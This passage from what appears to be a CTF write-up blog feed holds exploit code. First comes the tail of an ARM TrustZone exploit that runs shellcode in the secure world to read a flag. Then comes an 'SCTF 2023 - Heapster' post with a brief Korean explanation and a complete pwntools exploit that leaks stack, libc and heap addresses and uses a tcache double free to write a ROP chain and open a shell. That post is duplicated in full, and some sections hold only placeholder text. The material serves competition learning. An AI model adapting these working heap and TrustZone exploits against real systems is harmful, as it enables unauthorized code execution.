style="color:#66d9ef">if</span> size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0xFFFF</span>: </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movk x0, #</span><span style="color:#e6db74">{</span>hex(size<span style="color:#f92672">&gt;&gt;</span><span style="color:#ae81ff">16</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">, LSL #16;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str w0, [x28, #8];</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x3, #</span><span style="color:#e6db74">{</span>hex(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;tc_tci_call&#39;</span>] <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movk x3, #</span><span style="color:#e6db74">{</span>hex((elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;tc_tci_call&#39;</span>] <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">16</span>) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">, LSL #16;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x0, #</span><span style="color:#e6db74">{</span>hex(TCI_HANDLE<span style="color:#f92672">&amp;</span><span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movk x0, #</span><span style="color:#e6db74">{</span>hex(TCI_HANDLE<span style="color:#f92672">&gt;&gt;</span><span style="color:#ae81ff">16</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">, LSL #16;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x3;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> tc_tci_call<span style="color:#f92672">.</span>data <span style="color:#f92672">+=</span> data <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> assem </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">tc_tci_call_flush</span>() <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(tc_tci_call<span style="color:#f92672">.</span>data) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> tc_tci_call<span style="color:#f92672">.</span>data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">asm_load_key</span>(index: int) <span style="color:#f92672">-&gt;</span> str: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> tc_tci_call(<span style="color:#ae81ff">2</span>, index, <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">asm_save_key</span>(index: int, size: int, data: bytes) <span style="color:#f92672">-&gt;</span> str: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> tc_tci_call(<span style="color:#ae81ff">3</span>, index, size, data) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x18</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x20</span>) <span style="color:#75715e"># prev_size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x21</span>) <span style="color:#75715e"># size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x18</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x20</span>) <span style="color:#75715e"># prev_size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x21</span>) <span style="color:#75715e"># size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x10AE</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">12</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0xD6F241</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x10</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x20</span>) <span style="color:#75715e"># prev_size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x30</span>) <span style="color:#75715e"># size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x28</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0</span>) <span style="color:#75715e"># prev_size</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p32(<span style="color:#ae81ff">0x31</span>) <span style="color:#75715e"># size</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> isinstance(sel0_assem, str): </span></span><span style="display:flex;"><span> sel0_shellcode <span style="color:#f92672">=</span> make_thumb_shellcode(sel0_assem) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">else</span>: </span></span><span style="display:flex;"><span> sel0_shellcode <span style="color:#f92672">=</span> sel0_assem </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> sel0_shellcode <span style="color:#f92672">and</span> len(sel0_shellcode) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x400</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> sel0_shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> el0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x28, =</span><span style="color:#e6db74">{</span>hex(TCI_BUF)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0x10</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">3</span>, <span style="color:#ae81ff">0x10</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">4</span>, <span style="color:#ae81ff">0x10</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">4</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0x400</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">5</span>, <span style="color:#ae81ff">0xFFFFFFF0</span>, pl)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_save_key(<span style="color:#ae81ff">6</span>, <span style="color:#ae81ff">0x10</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&#39;</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span><span style="color:#e6db74">{</span>asm_load_key(<span style="color:#ae81ff">2</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> el0_assem </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> tc_tci_call_flush() </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">sel0_get_flag_assembly</span>() <span style="color:#f92672">-&gt;</span> str: </span></span><span style="display:flex;"><span> SEL_WSM_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x2400000</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x2000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movw r0, #</span><span style="color:#e6db74">{</span>hex(SEL_WSM_ADDR<span style="color:#f92672">&amp;</span><span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movt r0, #</span><span style="color:#e6db74">{</span>hex((SEL_WSM_ADDR<span style="color:#f92672">&gt;&gt;</span><span style="color:#ae81ff">16</span>)<span style="color:#f92672">&amp;</span><span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov r2, r0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">8</span>): </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mrc p15, 3, r1, c15, c12, </span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str r1, [r0], #4;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> assem <span style="color:#f92672">+=</span> <span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov r1, #0x0009;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add r1, r1, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> str r1, [r0], #4;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> svc #0x00; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> assem </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run.sh&#34;)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run_debug.sh&#34;)</span> </span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>SEL_WSM_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x2400000</span> <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x2000</span> </span></span><span style="display:flex;"><span>TCI_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFEFFFFE000</span> </span></span><span style="display:flex;"><span>sel0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> sel0_get_flag_assembly(), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x28, =</span><span style="color:#e6db74">{</span>hex(TCI_BUF)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movz x3, #</span><span style="color:#e6db74">{</span>hex(elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;puts&#39;</span>] <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> movk x3, #</span><span style="color:#e6db74">{</span>hex((elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;puts&#39;</span>]<span style="color:#f92672">&gt;&gt;</span><span style="color:#ae81ff">16</span>) <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFF</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">, LSL #16;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, x28;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x3;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span>, </span></span><span style="display:flex;"><span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># b *0x7FFEFFFFD120</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline() </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Flag: </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>close() </span></span></code></pre></div><h3 id="sel1">S.EL1</h3> <p>asdf</p> <h3 id="el3-1">EL3</h3> <p>asdf</p> <h1 id="reference">Reference</h1> <ul> <li><a href="https://developer.arm.com/documentation/ddi0487/latest/">https://developer.arm.com/documentation/ddi0487/latest/</a></li> </ul> SCTF 2023 - Heapster /posts/ctf/2023/samsungctf/heapster/ Wed, 23 Aug 2023 10:28:45 +0000 /posts/ctf/2023/samsungctf/heapster/ <h2 id="취약점">취약점</h2> <p>Validation 함수을 이용해서 Stack의 값을 알아낼 수 있고 PIE, LIBC_BASE, Stack의 주소를 알아낼 수 있다. 또한 Heap에 data 영역을 사용해서 Heap의 주소도 알아낼 수 있다.</p> <h2 id="익스플로잇">익스플로잇</h2> <div class="collapsable-code"> <input id="1" type="checkbox" checked /> <label for="1"> <span class="collapsable-code__language">python</span> <span class="collapsable-code__title">Exploit</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-python" ><code> from pwn import * import struct # context.log_level = &#39;debug&#39; libc_one_gadget = 0xebcf8 libc_pop_rsi = 0x000000000002be51 def conceal_next(pos, ptr): return (pos&gt;&gt;12) ^ ptr def reveal_next(x): tmp = x ^ ( (x&gt;&gt;12)&amp;0xfff000000 ) tmp = x ^ ( (tmp&gt;&gt;12)&amp;0xffffff000 ) tmp = x ^ ( (tmp&gt;&gt;12) ) return tmp def add(index, data): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;1&#39;) p.sendline(str(index).encode()) p.send(data) def delete(index): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;2&#39;) p.sendline(str(index).encode()) def print_node(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;3&#39;) def validation(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;4&#39;) def leak_stack(index): add(index, b&#39;a&#39;*8) stack_addr = b&#39;&#39; for _ in range(8): for i in range(0x01, 0xff&#43;1): add(index, stack_addr &#43; struct.pack(&#34;B&#34;, i) &#43; b&#39;\n&#39;) validation() result = p.recvuntil(b&#39;.\n&#39;) if(b&#39;success&#39; in result): stack_addr &#43;= struct.pack(&#34;B&#34;, i) break elif(b&#39;fail&#39; in result): continue else: print(&#34;ERROR&#34;) assert(0) add(index, b&#39;\x00&#39;) return u64(stack_addr.ljust(8, b&#39;\x00&#39;)) ######### Open Process and etc. ######### # p = process(&#39;./chal&#39;) p = remote(&#39;heapster.sstf.site&#39;, 31339) elf = ELF(&#39;./chal&#39;) libc = ELF(&#39;./libc.so.6&#39;) ######### Leak Informations ######### ### Leak Stack ### stack_addr = leak_stack(10) &#43; 8 log.info(&#34;STACK : &#34; &#43; hex(stack_addr)) ### Leak PIE base ### # I don&#39;t use PIE base address, but I just leak it. pie_addr = leak_stack(11) - 0x1792 log.info(&#34;PIE : &#34; &#43; hex(pie_addr)) ### Leak Libc base ### libc_base = leak_stack(21) - 0x29d90 # __libc_start_call_main&#43;128 log.info(&#34;LIBC : &#34; &#43; hex(libc_base)) ### Leak Heap ### # reuse heap used for leak ret and pie. delete(10) # now, tcache : 10 || count = 1 delete(11) # now, tcache : 11 -&gt; 10 || count = 2 print_node() p.recvuntil(b&#39;-&gt;&#39;) heap_addr = reveal_next(u64(p.recvuntil(b&#39;\n&#39;)[:-1].ljust(8, b&#39;\x00&#39;))) log.info(&#34;HEAP : &#34; &#43; hex(heap_addr)) ######### ROP using Double Free ######### ### set pop rdi ### # tcache : 11 -&gt; 10 || count = 2 add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr - 0x8))) # now, tcache : 11 -&gt; (sfp of main) ; 11 || count = 2 add(31, b&#39;a&#39;*16) # now, tcache : (sfp of main) ; 10 || count = 1 pl = p64(stack_addr &#43; 0x20) pl &#43;= p64(libc_base &#43; libc_pop_rsi) add(30, pl) # now, tcache : (null) ; 10 || count = 0 for _ in range(3): add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr &#43; 0x10 - 0x8))) # now, tcache : 11 -&gt; (ret&#43;8 of main) ; 10 || count = 2 add(29, b&#39;a&#39;*16) # now, tcache : (ret&#43;8 of main) ; 10 || count = 1 pl = p64(0) pl &#43;= p64(libc_base &#43; libc_one_gadget) add(28, pl) ######### Exit main and get shell ######### p.sendline(b&#39;5&#39;) p.interactive() </code></pre> </div> <h2 id="취약점">취약점</h2> <p>Validation 함수을 이용해서 Stack의 값을 알아낼 수 있고 PIE, LIBC_BASE, Stack의 주소를 알아낼 수 있다. 또한 Heap에 data 영역을 사용해서 Heap의 주소도 알아낼 수 있다.</p> <h2 id="익스플로잇">익스플로잇</h2> <div class="collapsable-code"> <input id="1" type="checkbox" checked /> <label for="1"> <span class="collapsable-code__language">python</span> <span class="collapsable-code__title">Exploit</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-python" ><code> from pwn import * import struct # context.log_level = &#39;debug&#39; libc_one_gadget = 0xebcf8 libc_pop_rsi = 0x000000000002be51 def conceal_next(pos, ptr): return (pos&gt;&gt;12) ^ ptr def reveal_next(x): tmp = x ^ ( (x&gt;&gt;12)&amp;0xfff000000 ) tmp = x ^ ( (tmp&gt;&gt;12)&amp;0xffffff000 ) tmp = x ^ ( (tmp&gt;&gt;12) ) return tmp def add(index, data): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;1&#39;) p.sendline(str(index).encode()) p.send(data) def delete(index): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;2&#39;) p.sendline(str(index).encode()) def print_node(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;3&#39;) def validation(): p.recvuntil(b&#39;cmd: &#39;) p.sendline(b&#39;4&#39;) def leak_stack(index): add(index, b&#39;a&#39;*8) stack_addr = b&#39;&#39; for _ in range(8): for i in range(0x01, 0xff&#43;1): add(index, stack_addr &#43; struct.pack(&#34;B&#34;, i) &#43; b&#39;\n&#39;) validation() result = p.recvuntil(b&#39;.\n&#39;) if(b&#39;success&#39; in result): stack_addr &#43;= struct.pack(&#34;B&#34;, i) break elif(b&#39;fail&#39; in result): continue else: print(&#34;ERROR&#34;) assert(0) add(index, b&#39;\x00&#39;) return u64(stack_addr.ljust(8, b&#39;\x00&#39;)) ######### Open Process and etc. ######### # p = process(&#39;./chal&#39;) p = remote(&#39;heapster.sstf.site&#39;, 31339) elf = ELF(&#39;./chal&#39;) libc = ELF(&#39;./libc.so.6&#39;) ######### Leak Informations ######### ### Leak Stack ### stack_addr = leak_stack(10) &#43; 8 log.info(&#34;STACK : &#34; &#43; hex(stack_addr)) ### Leak PIE base ### # I don&#39;t use PIE base address, but I just leak it. pie_addr = leak_stack(11) - 0x1792 log.info(&#34;PIE : &#34; &#43; hex(pie_addr)) ### Leak Libc base ### libc_base = leak_stack(21) - 0x29d90 # __libc_start_call_main&#43;128 log.info(&#34;LIBC : &#34; &#43; hex(libc_base)) ### Leak Heap ### # reuse heap used for leak ret and pie. delete(10) # now, tcache : 10 || count = 1 delete(11) # now, tcache : 11 -&gt; 10 || count = 2 print_node() p.recvuntil(b&#39;-&gt;&#39;) heap_addr = reveal_next(u64(p.recvuntil(b&#39;\n&#39;)[:-1].ljust(8, b&#39;\x00&#39;))) log.info(&#34;HEAP : &#34; &#43; hex(heap_addr)) ######### ROP using Double Free ######### ### set pop rdi ### # tcache : 11 -&gt; 10 || count = 2 add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr - 0x8))) # now, tcache : 11 -&gt; (sfp of main) ; 11 || count = 2 add(31, b&#39;a&#39;*16) # now, tcache : (sfp of main) ; 10 || count = 1 pl = p64(stack_addr &#43; 0x20) pl &#43;= p64(libc_base &#43; libc_pop_rsi) add(30, pl) # now, tcache : (null) ; 10 || count = 0 for _ in range(3): add(11, b&#39;a&#39;*16) delete(11) # now, tcache : 11 -&gt; 11 -&gt; 11 ; 10 || count = 3 add(3, p64(conceal_next(heap_addr &#43; 0x20, stack_addr &#43; 0x10 - 0x8))) # now, tcache : 11 -&gt; (ret&#43;8 of main) ; 10 || count = 2 add(29, b&#39;a&#39;*16) # now, tcache : (ret&#43;8 of main) ; 10 || count = 1 pl = p64(0) pl &#43;= p64(libc_base &#43; libc_one_gadget) add(28, pl) ######### Exit main and get shell ######### p.sendline(b&#39;5&#39;) p.interactive() </code></pre> </div>